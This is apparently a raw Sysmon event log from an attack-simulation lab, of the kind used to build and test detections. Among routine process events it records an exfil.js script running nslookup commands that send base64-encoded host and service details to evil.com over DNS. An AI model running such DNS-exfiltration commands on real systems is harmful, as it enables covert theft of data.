10341000x8000000000000000209399Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:33.214{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-18ED-629A-DA43-000000005F02}6448C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000209398Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:33.214{2E1864BB-18ED-629A-D843-000000005F02}77567236C:\Windows\system32\cmd.exe{2E1864BB-18ED-629A-DA43-000000005F02}6448C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000209397Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:33.221{2E1864BB-18ED-629A-DA43-000000005F02}6448C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=A U2VydmljZU5hbWU6IGVuYQ== evil.com C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{2E1864BB-18ED-629A-D843-000000005F02}7756C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A U2VydmljZU5hbWU6IGVuYQ== evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nloged.tmp 2>&1 10341000x8000000000000000209396Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:33.181{2E1864BB-E13E-6299-1000-000000005F02}3641888C:\Windows\system32\svchost.exe{2E1864BB-18ED-629A-D943-000000005F02}3596C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000209395Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:33.181{2E1864BB-E13E-6299-1000-000000005F02}3641376C:\Windows\system32\svchost.exe{2E1864BB-18ED-629A-D943-000000005F02}3596C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000209394Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:33.181{2E1864BB-18ED-629A-D943-000000005F02}35961736C:\Windows\system32\conhost.exe{2E1864BB-18ED-629A-D843-000000005F02}7756C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000209393Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:33.159{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-18ED-629A-D943-000000005F02}3596C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000209392Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:33.159{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000209391Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:33.159{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000209390Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:33.159{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000209389Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:33.159{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000209388Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:33.159{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-18ED-629A-D843-000000005F02}7756C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000209387Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:33.159{2E1864BB-18E0-629A-6742-000000005F02}39767368C:\Windows\System32\WScript.exe{2E1864BB-18ED-629A-D843-000000005F02}7756C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e79b|C:\Windows\System32\windows.storage.dll+16e4b1|C:\Windows\System32\windows.storage.dll+16e0fe|C:\Windows\System32\windows.storage.dll+16f3a0|C:\Windows\System32\windows.storage.dll+16de4e|C:\Windows\System32\windows.storage.dll+fce4d|C:\Windows\System32\windows.storage.dll+fd58c|C:\Windows\System32\windows.storage.dll+fc8f0|C:\Windows\System32\SHELL32.dll+49d0f|C:\Windows\System32\SHELL32.dll+49b9c|C:\Windows\System32\SHELL32.dll+b2f5e|C:\Windows\System32\shcore.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000209386Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:33.160{2E1864BB-18ED-629A-D843-000000005F02}7756C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A U2VydmljZU5hbWU6IGVuYQ== evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nloged.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{2E1864BB-18E0-629A-6742-000000005F02}3976C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 23542300x8000000000000000209385Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:33.143{2E1864BB-18E0-629A-6742-000000005F02}3976ATTACKRANGE\AdministratorC:\Windows\System32\WScript.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\nlmuukf.tmpMD5=E7F6E6FF66DADCE192851D5CEE89C151,SHA256=52916EC751E038AB876F6BC77E3DDBA879A78F00C8F4A0915C022D7C501FFEAB,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000209384Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:33.128{2E1864BB-18ED-629A-D643-000000005F02}20562388C:\Windows\system32\conhost.exe{2E1864BB-18ED-629A-D743-000000005F02}7408C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000209383Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:33.112{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000209382Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:33.112{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-18ED-629A-D743-000000005F02}7408C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000209381Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:33.112{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000209380Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:33.112{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000209379Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:33.112{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000209378Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:33.112{2E1864BB-18ED-629A-D543-000000005F02}7712312C:\Windows\system32\cmd.exe{2E1864BB-18ED-629A-D743-000000005F02}7408C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000209377Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:33.122{2E1864BB-18ED-629A-D743-000000005F02}7408C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=A RE5TSG9zdE5hbWU6IHdpbi1kYy1jdC1hdHRhY2stcmFuZ2UtMzA0 evil.com C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{2E1864BB-18ED-629A-D543-000000005F02}7712C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A RE5TSG9zdE5hbWU6IHdpbi1kYy1jdC1hdHRhY2stcmFuZ2UtMzA0 evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlmuukf.tmp 2>&1 10341000x8000000000000000209376Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:33.097{2E1864BB-E13E-6299-1000-000000005F02}3641888C:\Windows\system32\svchost.exe{2E1864BB-18ED-629A-D643-000000005F02}2056C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000209375Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:33.097{2E1864BB-E13E-6299-1000-000000005F02}3641376C:\Windows\system32\svchost.exe{2E1864BB-18ED-629A-D643-000000005F02}2056C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000209374Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:33.081{2E1864BB-18ED-629A-D643-000000005F02}20562388C:\Windows\system32\conhost.exe{2E1864BB-18ED-629A-D543-000000005F02}7712C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000209373Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:33.081{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-18ED-629A-D643-000000005F02}2056C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000209372Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:33.059{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-18ED-629A-D543-000000005F02}7712C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000209371Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:33.076{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000209370Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:33.076{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000209369Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:33.059{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000209368Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:33.059{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000209367Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 